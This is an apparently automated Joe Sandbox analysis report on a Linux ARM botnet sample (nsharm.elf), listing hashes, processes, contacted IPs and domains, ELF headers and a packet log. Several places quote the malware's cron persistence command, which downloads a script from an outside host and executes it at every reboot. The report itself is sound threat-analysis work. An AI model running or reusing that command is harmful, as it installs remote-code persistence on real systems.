Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nsharm.elf

Overview

General Information

Sample name:nsharm.elf
Analysis ID:1542857
MD5:87f114f7f6a5830d45ffe101ccd0de1c
SHA1:1156d361e2050a882e4b224410682e116575588d
SHA256:bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542857
Start date and time:2024-10-26 19:16:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nsharm.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@24/0
  • VT rate limit hit for: nsharm.elf
Command:/tmp/nsharm.elf
PID:5453
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nsharm.elf (PID: 5453, Parent: 5374, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nsharm.elf
    • sh (PID: 5455, Parent: 5453, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5457, Parent: 5455)
        • sh New Fork (PID: 5459, Parent: 5457)
        • crontab (PID: 5459, Parent: 5457, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5458, Parent: 5455)
      • crontab (PID: 5458, Parent: 5455, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nsharm.elfReversingLabs: Detection: 21%
Source: tmp.hvpvrW.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 31.13.248.89 ports 24818,4242,1,2,22281,4,8,10220
Source: global trafficTCP traffic: 86.107.100.80 ports 21676,25455,2,4,5,12892
Source: global trafficTCP traffic: 192.168.2.13:39080 -> 86.107.100.80:25455
Source: global trafficTCP traffic: 192.168.2.13:54646 -> 31.13.248.89:24818
Source: global trafficTCP traffic: 192.168.2.13:47922 -> 81.29.149.178:13812
Source: global trafficTCP traffic: 192.168.2.13:46038 -> 213.182.204.57:21752
Source: global trafficTCP traffic: 192.168.2.13:52898 -> 185.82.200.181:6271
Source: global trafficTCP traffic: 192.168.2.13:37010 -> 193.233.193.45:2515
Source: global trafficTCP traffic: 192.168.2.13:54720 -> 91.149.218.232:1414
Source: global trafficTCP traffic: 192.168.2.13:45206 -> 91.149.238.18:23231
Source: /tmp/nsharm.elf (PID: 5453)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknownUDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.hvpvrW.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@24/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5459)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5458)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 5458)File: /var/spool/cron/crontabs/tmp.hvpvrWJump to behavior
Source: /usr/bin/crontab (PID: 5458)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nsharm.elf (PID: 5455)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nsharm.elf (PID: 5453)Queries kernel information via 'uname': Jump to behavior
Source: nsharm.elf, 5453.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5460.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/nsharm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm.elf
Source: nsharm.elf, 5453.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5460.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5504.1.000055dd178d3000.000055dd17a42000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: nsharm.elf, 5453.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5460.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5504.1.000055dd178d3000.000055dd17a42000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nsharm.elf, 5453.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5460.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542857 Sample: nsharm.elf Startdate: 26/10/2024 Architecture: LINUX Score: 60 30 31.13.248.89, 10220, 22281, 24818 NETERRA-ASBG Bulgaria 2->30 32 86.107.100.80, 12892, 21676, 25455 AMG-ASRO Romania 2->32 34 8 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nsharm.elf 2->9         started        signatures3 process4 process5 11 nsharm.elf sh 9->11         started        13 nsharm.elf 9->13         started        15 nsharm.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nsharm.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.hvpvrW, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nsharm.elf21%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    unknown
    kingstonwikkerink.dyn
    195.133.92.51
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;tmp.hvpvrW.18.drfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        185.82.200.181
        unknownNetherlands
        60117HSAEfalse
        213.182.204.57
        unknownLatvia
        9009M247GBfalse
        193.233.193.45
        unknownRussian Federation
        2895FREE-NET-ASFREEnetEUfalse
        91.149.218.232
        unknownPoland
        198401GECKONET-ASPLfalse
        31.13.248.89
        unknownBulgaria
        34224NETERRA-ASBGtrue
        86.107.100.80
        unknownRomania
        38995AMG-ASROtrue
        81.29.149.178
        unknownSwitzerland
        39616COMUNICA_IT_SERVICESCHfalse
        91.149.238.18
        unknownPoland
        41952MARTON-ASPLfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        185.82.200.181harm5.elfGet hashmaliciousUnknownBrowse
          nshsh4.elfGet hashmaliciousUnknownBrowse
            harm4.elfGet hashmaliciousUnknownBrowse
              mips.elfGet hashmaliciousUnknownBrowse
                mpsl.elfGet hashmaliciousUnknownBrowse
                  arm4.elfGet hashmaliciousUnknownBrowse
                    na.elfGet hashmaliciousUnknownBrowse
                      213.182.204.57nsharm5.elfGet hashmaliciousUnknownBrowse
                        harm5.elfGet hashmaliciousUnknownBrowse
                          harm4.elfGet hashmaliciousUnknownBrowse
                            mips.elfGet hashmaliciousUnknownBrowse
                              hmips.elfGet hashmaliciousUnknownBrowse
                                arm7.elfGet hashmaliciousUnknownBrowse
                                  mips.elfGet hashmaliciousUnknownBrowse
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                      x86.elfGet hashmaliciousUnknownBrowse
                                        193.233.193.45harm5.elfGet hashmaliciousUnknownBrowse
                                          nshsh4.elfGet hashmaliciousUnknownBrowse
                                            harm4.elfGet hashmaliciousUnknownBrowse
                                              mips.elfGet hashmaliciousUnknownBrowse
                                                hmips.elfGet hashmaliciousUnknownBrowse
                                                  91.149.218.232nsharm5.elfGet hashmaliciousUnknownBrowse
                                                    nshsh4.elfGet hashmaliciousUnknownBrowse
                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                        ppc.elfGet hashmaliciousUnknownBrowse
                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                            31.13.248.89gmpsl.elfGet hashmaliciousUnknownBrowse
                                                              nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                harm5.elfGet hashmaliciousUnknownBrowse
                                                                  nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                                          arm4.elfGet hashmaliciousUnknownBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            daisy.ubuntu.comgmpsl.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.25
                                                                            nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            harm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.25
                                                                            sshd.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            nsharm6.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            .i.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.25
                                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            c0r0n4x.arm6.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            c0r0n4x.x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 162.213.35.24
                                                                            kingstonwikkerink.dyngmpsl.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            harm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 194.87.198.29
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 31.13.248.89
                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 81.29.149.178
                                                                            arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            hmips.elfGet hashmaliciousUnknownBrowse
                                                                            • 194.87.198.29
                                                                            arm7.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            M247GBnsharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            harm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 213.182.204.57
                                                                            T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                            • 91.202.233.141
                                                                            lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                            • 91.202.233.141
                                                                            Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                            • 91.202.233.141
                                                                            thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                                                            • 91.202.233.141
                                                                            botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 37.120.192.49
                                                                            la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                            • 77.36.125.19
                                                                            HSAEharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            mpsl.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            arm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 185.82.200.181
                                                                            Copia r#U00e1pida del pago INV 00932024.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 194.36.191.196
                                                                            SecuriteInfo.com.Heur.27949.8326.docxGet hashmaliciousUnknownBrowse
                                                                            • 185.82.202.150
                                                                            Proforma Invoice NOCAP PLASTIK AMBALA.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 194.36.191.196
                                                                            ynwj.ps1Get hashmaliciousUnknownBrowse
                                                                            • 194.36.191.196
                                                                            GECKONET-ASPLnsharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.149.218.232
                                                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.149.218.232
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.149.218.232
                                                                            botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 91.234.13.57
                                                                            ppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.149.218.232
                                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 91.149.218.232
                                                                            aWoyoSGAsv.elfGet hashmaliciousMiraiBrowse
                                                                            • 45.82.146.198
                                                                            FREE-NET-ASFREEnetEUharm5.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            harm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                            • 147.45.44.131
                                                                            hmips.elfGet hashmaliciousUnknownBrowse
                                                                            • 193.233.193.45
                                                                            5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeGet hashmaliciousStealc, VidarBrowse
                                                                            • 147.45.44.221
                                                                            http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exeGet hashmaliciousUnknownBrowse
                                                                            • 147.45.44.104
                                                                            http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exeGet hashmaliciousUnknownBrowse
                                                                            • 147.45.44.104
                                                                            http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exeGet hashmaliciousUnknownBrowse
                                                                            • 147.45.44.104
                                                                            No context
                                                                            No context
                                                                            Process:/usr/bin/crontab
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):306
                                                                            Entropy (8bit):5.1650264720793055
                                                                            Encrypted:false
                                                                            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQzPXUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8zPMeHLUHYC+GABjnOGAFkz
                                                                            MD5:3A1477F76AC6B2438CFEF8D3361A05AC
                                                                            SHA1:45674226017D153B39765B70CD9B06427CA4520B
                                                                            SHA-256:DA0B25D2B2BD7A0E8AE1C523E784400BE070D86165EFC0A9BBABE248F69EDB94
                                                                            SHA-512:A80F69C3B7FE44150783064FC7FF96A62609DEDE377941039473C3C1474CCAB064E3A3715D9E84B8CADC22520DB1E681CE96FEF1B2AE8600D407C5370F2FFC1A
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:16:57 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                            Entropy (8bit):6.121362896226222
                                                                            TrID:
                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                            File name:nsharm.elf
                                                                            File size:77'600 bytes
                                                                            MD5:87f114f7f6a5830d45ffe101ccd0de1c
                                                                            SHA1:1156d361e2050a882e4b224410682e116575588d
                                                                            SHA256:bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
                                                                            SHA512:1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b
                                                                            SSDEEP:1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W
                                                                            TLSH:EB733A45BC815A13C6D112BBFB6E428D772653A8E3EF3207DA256F21378B82B0E77541
                                                                            File Content Preview:.ELF...a..........(.........4....-......4. ...(......................)...)...............)...)...).......T..........Q.td..................................-...L."....C..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                            ELF header

                                                                            Class:ELF32
                                                                            Data:2's complement, little endian
                                                                            Version:1 (current)
                                                                            Machine:ARM
                                                                            Version Number:0x1
                                                                            Type:EXEC (Executable file)
                                                                            OS/ABI:ARM - ABI
                                                                            ABI Version:0
                                                                            Entry Point Address:0x8190
                                                                            Flags:0x202
                                                                            ELF Header Size:52
                                                                            Program Header Offset:52
                                                                            Program Header Size:32
                                                                            Number of Program Headers:3
                                                                            Section Header Offset:77200
                                                                            Section Header Size:40
                                                                            Number of Section Headers:10
                                                                            Header String Table Index:9
                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                            NULL0x00x00x00x00x0000
                                                                            .initPROGBITS0x80940x940x180x00x6AX004
                                                                            .textPROGBITS0x80b00xb00x10f600x00x6AX0016
                                                                            .finiPROGBITS0x190100x110100x140x00x6AX004
                                                                            .rodataPROGBITS0x190240x110240x19940x00x2A004
                                                                            .ctorsPROGBITS0x229bc0x129bc0x80x00x3WA004
                                                                            .dtorsPROGBITS0x229c40x129c40x80x00x3WA004
                                                                            .dataPROGBITS0x229d00x129d00x3800x00x3WA004
                                                                            .bssNOBITS0x22d500x12d500x510c0x00x3WA004
                                                                            .shstrtabSTRTAB0x00x12d500x3e0x00x0001
                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                            LOAD0x00x80000x80000x129b80x129b86.15060x5R E0x8000.init .text .fini .rodata
                                                                            LOAD0x129bc0x229bc0x229bc0x3940x54a02.85380x6RW 0x8000.ctors .dtors .data .bss
                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 26, 2024 19:16:58.171935081 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:16:58.177295923 CEST254553908086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:16:58.177376032 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:16:58.177541018 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:16:58.183047056 CEST254553908086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:16:58.183089018 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:16:58.188431978 CEST254553908086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:16:59.544830084 CEST254553908086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:16:59.544948101 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:16:59.545145988 CEST3908025455192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:09.564397097 CEST5464624818192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:09.569816113 CEST248185464631.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:09.569907904 CEST5464624818192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:09.569907904 CEST5464624818192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:09.575333118 CEST248185464631.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:09.575392962 CEST5464624818192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:09.580841064 CEST248185464631.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:10.201116085 CEST248185464631.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:10.201366901 CEST5464624818192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:10.206878901 CEST248185464631.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:15.285408020 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:15.290852070 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:15.290993929 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:15.291018963 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:15.296432018 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:15.296493053 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:15.301907063 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:16.180845022 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:16.181066990 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:16.181066990 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:16.181410074 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:16.181494951 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:16.181593895 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:16.181639910 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:16.182012081 CEST138124792281.29.149.178192.168.2.13
                                                                            Oct 26, 2024 19:17:16.182075024 CEST4792213812192.168.2.1381.29.149.178
                                                                            Oct 26, 2024 19:17:21.218502045 CEST4784422281192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:21.224009991 CEST222814784431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:21.224142075 CEST4784422281192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:21.224142075 CEST4784422281192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:21.229496002 CEST222814784431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:21.229568005 CEST4784422281192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:21.234941006 CEST222814784431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:21.847544909 CEST222814784431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:21.847734928 CEST4784422281192.168.2.1331.13.248.89
                                                                            Oct 26, 2024 19:17:21.853209019 CEST222814784431.13.248.89192.168.2.13
                                                                            Oct 26, 2024 19:17:26.916112900 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:26.921591043 CEST2175246038213.182.204.57192.168.2.13
                                                                            Oct 26, 2024 19:17:26.921700001 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:26.921770096 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:26.927191973 CEST2175246038213.182.204.57192.168.2.13
                                                                            Oct 26, 2024 19:17:26.927257061 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:26.932672024 CEST2175246038213.182.204.57192.168.2.13
                                                                            Oct 26, 2024 19:17:27.844522953 CEST2175246038213.182.204.57192.168.2.13
                                                                            Oct 26, 2024 19:17:27.844795942 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:27.844904900 CEST4603821752192.168.2.13213.182.204.57
                                                                            Oct 26, 2024 19:17:32.878983021 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:32.884519100 CEST128924339086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:17:32.884610891 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:32.884654999 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:32.890270948 CEST128924339086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:17:32.890352011 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:32.896447897 CEST128924339086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:17:34.258059978 CEST128924339086.107.100.80192.168.2.13
                                                                            Oct 26, 2024 19:17:34.258193970 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:34.258330107 CEST4339012892192.168.2.1386.107.100.80
                                                                            Oct 26, 2024 19:17:44.296891928 CEST528986271192.168.2.13185.82.200.181
